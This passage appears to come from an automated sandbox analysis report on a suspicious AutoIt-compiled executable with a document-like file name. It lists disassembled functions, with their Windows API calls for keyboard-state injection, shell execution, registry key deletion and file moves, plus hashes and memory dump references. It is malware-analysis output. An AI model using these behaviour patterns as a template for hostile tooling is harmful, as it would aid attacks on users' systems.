                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                        • _wcstok.LIBCMT ref: 00761D6E
                                                        • _wcscpy.LIBCMT ref: 00761DFD
                                                        • _memset.LIBCMT ref: 00761E30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X$t:|p:|
                                                        • API String ID: 774024439-2855489919
                                                        • Opcode ID: e9bc4a2812e0de19b62d30aa9fa5c0257c3554f9273d92e1bfff42e5cb5f630c
                                                        • Instruction ID: 66571fb3f330c7528f91816919e2deb533dc9a583bcdf87baa594ac2e4f29489
                                                        • Opcode Fuzzy Hash: e9bc4a2812e0de19b62d30aa9fa5c0257c3554f9273d92e1bfff42e5cb5f630c
                                                        • Instruction Fuzzy Hash: 00C18471508341DFC724EF28C889E9AB7E4BF85310F44492DF896972A2DB78ED45CB92
                                                        Function 0072B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc42e3ac7c287d3754903d4b97d698f49bc4b715eb5f71999d78aca726181297
                                                        • Instruction ID: 5815e53e6f98d6f045521b30dd2182a0bc4c2b42853ae972e8aa05ac461accbe
                                                        • Opcode Fuzzy Hash: bc42e3ac7c287d3754903d4b97d698f49bc4b715eb5f71999d78aca726181297
                                                        • Instruction Fuzzy Hash: E2719A70900559EFCB14DF98DC88EBEBB74FF85314F208159F915AA251C738AA52CFA0
                                                        Function 00772121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0077214B
                                                        • _memset.LIBCMT ref: 00772214
                                                        • ShellExecuteExW.SHELL32(?), ref: 00772259
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00772320
                                                        • FreeLibrary.KERNEL32(00000000), ref: 0077232F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 4082843840-2766056989
                                                        • Opcode ID: ae733b82bfb1fbbb64ddbfc9677104d06912947009ca0571eb72eb5743ebd1d8
                                                        • Instruction ID: 4ed1015e1be2feeed0b059ba86913a794b0597b23a0a6183d336cd2d5b080f4a
                                                        • Opcode Fuzzy Hash: ae733b82bfb1fbbb64ddbfc9677104d06912947009ca0571eb72eb5743ebd1d8
                                                        • Instruction Fuzzy Hash: EB71A371A00619DFCF14EFA8C89599EB7F5FF48310F108059E85AAB392DB38AD41CB90
                                                        Function 007547DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 0075481D
                                                        • GetKeyboardState.USER32(?), ref: 00754832
                                                        • SetKeyboardState.USER32(?), ref: 00754893
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 007548C1
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 007548E0
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00754926
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00754949
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 57ea388b8c92b4edccb3e42496ded6afc86a737b969ecae0b5303f38e9957f97
                                                        • Instruction ID: 07d8bc15e46073d9051955b58f8d00dbda016f7e9c5ee7d453e650f3f9798d21
                                                        • Opcode Fuzzy Hash: 57ea388b8c92b4edccb3e42496ded6afc86a737b969ecae0b5303f38e9957f97
                                                        • Instruction Fuzzy Hash: 1451C2A05087D53DFB3647248C4ABFABEA95B0630AF088589E9D9468C2D7DCBDCCD750
                                                        Function 007545F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00754638
                                                        • GetKeyboardState.USER32(?), ref: 0075464D
                                                        • SetKeyboardState.USER32(?), ref: 007546AE
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007546DA
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007546F7
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0075473B
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0075475C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: bddf7ab53f06b269b33ebfab4c720f313d279efa55c0297e3ab5372efa78fd59
                                                        • Instruction ID: 7c7cb3b706590ccc94d1dc033b4ca88ff12ad6ecedd7b3faae3c02a0f277b209
                                                        • Opcode Fuzzy Hash: bddf7ab53f06b269b33ebfab4c720f313d279efa55c0297e3ab5372efa78fd59
                                                        • Instruction Fuzzy Hash: DB51E5A05047D57DFB3687248C45BF67EA9AB0630AF088889E9D4468C2D3D9ECDCD750
                                                        Function 007586AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: 024b5d747b754d5389a60f1ed35d7955e04c5a48dd91fbc9758099774a01b469
                                                        • Instruction ID: c5461df8c47a07b443ec1aff309f6a30c1637e96b9a1b46be5916f70fa48ac67
                                                        • Opcode Fuzzy Hash: 024b5d747b754d5389a60f1ed35d7955e04c5a48dd91fbc9758099774a01b469
                                                        • Instruction Fuzzy Hash: 9B415F75C11214B6DB50ABF4CC8AACFB7ACEF04710F508866E915F3123EA78E25587A6
                                                        Function 00773C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00773C92
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00773CBC
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00773D71
                                                          • Part of subcall function 00773C63: RegCloseKey.ADVAPI32(?), ref: 00773CD9
                                                          • Part of subcall function 00773C63: FreeLibrary.KERNEL32(?), ref: 00773D2B
                                                          • Part of subcall function 00773C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00773D4E
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00773D16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: 8ebbac1783b610ca600a8fd966863ebba47740b010f673437ed76f1dd6637987
                                                        • Instruction ID: 42de0a0fff34772100ad3e1d78228bae74be301402c44dc6de55e8c346f9cefa
                                                        • Opcode Fuzzy Hash: 8ebbac1783b610ca600a8fd966863ebba47740b010f673437ed76f1dd6637987
                                                        • Instruction Fuzzy Hash: A3310971A01209FFDF259B94DC89AFEB7BCEF08340F00856AE516A2151E7789F499B60
                                                        Function 00778DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00778DF4
                                                        • GetWindowLongW.USER32(0177C7C8,000000F0), ref: 00778E27
                                                        • GetWindowLongW.USER32(0177C7C8,000000F0), ref: 00778E5C
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00778E8E
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00778EB8
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00778EC9
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00778EE3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 03b680983bb498eb61048d50a1fc2d5ec3079f37c6f20fb5ec62127145ec9172
                                                        • Instruction ID: e0ec2aff21c8d135fd9ab952b51be34636bd10ab5f8f5e388e8d5d24850b5a73
                                                        • Opcode Fuzzy Hash: 03b680983bb498eb61048d50a1fc2d5ec3079f37c6f20fb5ec62127145ec9172
                                                        • Instruction Fuzzy Hash: 43311531280210EFDF60CF58DC88F6537A5FB4A7A4F158166F5098B2B2CBB9AC41DB46
                                                        Function 007516F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00751734
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0075175A
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0075175D
                                                        • SysAllocString.OLEAUT32(?), ref: 0075177B
                                                        • SysFreeString.OLEAUT32(?), ref: 00751784
                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007517A9
                                                        • SysAllocString.OLEAUT32(?), ref: 007517B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 03e894581ddf869456d6157b8f51fb5472599a6aa0d7a13d2fb727f5063daa9a
                                                        • Instruction ID: a0db6ab81e3e0550944e28b67c2315cf14995f9b06c16edbb56245a2ac1068a4
                                                        • Opcode Fuzzy Hash: 03e894581ddf869456d6157b8f51fb5472599a6aa0d7a13d2fb727f5063daa9a
                                                        • Instruction Fuzzy Hash: 0A215375600219AF9B10DBACCC88DEE73ECEB0D761B408526FD15DB251E678EC4587A4
                                                        Function 007569F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00756A2B
                                                        • _wcscmp.LIBCMT ref: 00756A49
                                                        • MoveFileW.KERNEL32(?,?), ref: 00756A62
                                                          • Part of subcall function 00756D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00756DBA
                                                          • Part of subcall function 00756D6D: GetLastError.KERNEL32 ref: 00756DC5
                                                          • Part of subcall function 00756D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00756DD9
                                                        • _wcscat.LIBCMT ref: 00756AA4
                                                        • SHFileOperationW.SHELL32(?), ref: 00756B0C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2323102230-1173974218
                                                        • Opcode ID: 9075d0cbda8424f730036c96867d856b706c271f2bacbfa416d630f00b9ea1e5
                                                        • Instruction ID: d4882212e00c7f493fef641745dea79cb6ad8562d8437ba2ffda14efc2a94fef
                                                        • Opcode Fuzzy Hash: 9075d0cbda8424f730036c96867d856b706c271f2bacbfa416d630f00b9ea1e5
                                                        • Instruction Fuzzy Hash: D6313AB1D00218AADF50EFB4D845BDDB7B8AF08301F5085DAE905E3141EB789B89CF64
                                                        Function 00752FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 01581e9efea12d397e06fcf4d1cd429c236e5adbd23eec460bf02b911f7282fb
                                                        • Instruction ID: 9c98adc429b76a741bf3fa700d5dda878a166b72f11077dab1285f27f01d6e69
                                                        • Opcode Fuzzy Hash: 01581e9efea12d397e06fcf4d1cd429c236e5adbd23eec460bf02b911f7282fb
                                                        • Instruction Fuzzy Hash: 66213A32104211BAD231B634AC0AEFB73A99F56352F504025FC4A871D3EBDD9E87C390
                                                        Function 007517C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0075180D
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00751833
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00751836
                                                        • SysAllocString.OLEAUT32 ref: 00751857
                                                        • SysFreeString.OLEAUT32 ref: 00751860
                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0075187A
                                                        • SysAllocString.OLEAUT32(?), ref: 00751888
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 144185f980c8c34e785da61c46ee78be57a227804216886a8cab00309807c4b6
                                                        • Instruction ID: 1bdb9d28547e35076d0fabe3cd1507cb3fb8f8919a0a0c294cce5be2709b2696
                                                        • Opcode Fuzzy Hash: 144185f980c8c34e785da61c46ee78be57a227804216886a8cab00309807c4b6
                                                        • Instruction Fuzzy Hash: 94213275600204AF9B209BB8CC89DAE77ECEB09371B808526FD15DB261D6B8FC458764
                                                        Function 0077A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                          • Part of subcall function 0072C619: GetStockObject.GDI32(00000011), ref: 0072C66B
                                                          • Part of subcall function 0072C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0077A13B
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0077A148
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0077A153
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0077A162
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0077A16E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 03ad71d84c3c259e7e064dbf44dc3db07b9c6bf1cd3d73665b9b34e74d9cfdb4
                                                        • Instruction ID: 3f89f5bf1c0d6c67cb701740e3e2b87fd030f801d416a6269c7f740f77663368
                                                        • Opcode Fuzzy Hash: 03ad71d84c3c259e7e064dbf44dc3db07b9c6bf1cd3d73665b9b34e74d9cfdb4
                                                        • Instruction Fuzzy Hash: 061198B115011DBEFF155F65CC85EEB7F6DEF08798F018115F608A6090C6769C21DBA4
                                                        Function 00734C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd_noexit.LIBCMT ref: 00734C3E
                                                          • Part of subcall function 007386B5: GetLastError.KERNEL32(?,00730127,007388A3,00734673,?,?,00730127,?,0071125D,00000058,?,?), ref: 007386B7
                                                          • Part of subcall function 007386B5: __calloc_crt.LIBCMT ref: 007386D8
                                                          • Part of subcall function 007386B5: GetCurrentThreadId.KERNEL32 ref: 00738701
                                                          • Part of subcall function 007386B5: SetLastError.KERNEL32(00000000,00730127,007388A3,00734673,?,?,00730127,?,0071125D,00000058,?,?), ref: 00738719
                                                        • CloseHandle.KERNEL32(?,?,00734C1D), ref: 00734C52
                                                        • __freeptd.LIBCMT ref: 00734C59
